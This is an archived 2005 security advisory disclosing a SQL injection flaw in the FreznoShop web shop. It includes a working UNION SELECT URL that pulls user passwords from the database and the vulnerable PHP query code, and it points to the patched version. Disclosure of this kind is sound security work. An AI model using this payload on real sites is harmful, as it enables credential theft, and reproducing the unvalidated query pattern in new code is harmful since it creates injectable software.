FreznoShopSQL.txt

FreznoShopSQL.txt: Posted Aug 11, 2005; Authored by Mike Shema | Site ntobjectives.com; Versions of FreznoShop below 1.4.1 are vulnerable to SQL injection attacks due to a lack of input validation on parameters used in database queries. Sample exploitation provided.; tags | exploit, sql injection; SHA-256 | bb41250b3bed688b2353f87c21a762846fbdd3c0632679bc8735b511054a6def; Download | Favorite | View

FreznoShopSQL.txt

FreznoShop Vulnerability Details

Date: May 13, 2005
Mike Shema <mshema@ntobjectives.com>

Versions of FreznoShop 
(<http://www.freznoshop.de/>http://www.freznoshop.de/) below 1.4.1 
are vulnerable to SQL injection due to the use of unvalidated 
parameters in database queries. Some unpatched versions of 1.4.1 are 
vulnerable as well.

The value of the 'id' parameter is passed directly to the SQL query 
function. No validation of content or filtering of malicious 
characters is performed. Database error messages are suppressed such 
that they will not reach the web browser, but this does not prevent 
arbitrary queries from being constructed. The following URL 
demonstrates a value for 'id' that displays a user's username and 
password in the HTML response:

<http://site/freznoshop/product_details.php?id=1+UNION+SELECT+1,u_password,u_name,1,1,1,1,1,1,1,1,1+FROM+fs_users+LIMIT+1,1>http://site/freznoshop/product_details.php?id=1+UNION+SELECT+1,u_password,u_name,1,1,1,1,1,1,1,1,1+FROM+fs_users+LIMIT+1,1

The specific problem lies in the product_details.php and 
libclasses/lib.shop.php files.

product_details.php, c. line 63
-------------------------------
...
$prod = loadProduct($HTTP_GET_VARS['id']);
...
-------------------------------

libclasses/lib.shop.php, c. line 83
-----------------------------------
...
function loadProduct($id)
{
     $table1 = DB_PREFIX .'products p';
     $table2 = DB_PREFIX .'products_categories pc';

     $sql = db_query("SELECT p.p_id,
                             p.p_item_nr,
                             p.p_name,
                             p.p_desc,
                             p.p_desc_long,
                             p.p_image,
                             p.p_price,
                             p.p_show_img,
                             p.p_sp_price,
                             p.p_has_special,
                             p.p_has_style,
                             pc.category_id
                      FROM   $table1, $table2
                      WHERE  p.p_id = pc.product_id
                      AND    p.p_id = $id
                     ");
...
-----------------------------------

Users of this application should download the latest version of 
FreznoShop, which implements an is_numeric() check of the $id 
parameter in the product_details.php file to prevent this particular 
attack.

Top Authors In Last 30 Days

Red Hat 300 files
Ubuntu 63 files
Debian 20 files
LiquidWorm 19 files
Apple 9 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files
nu11secur1ty 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,928)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,326)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,981)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

FreznoShopSQL.txt

FreznoShopSQL.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

FreznoShopSQL.txt

Share This

FreznoShopSQL.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems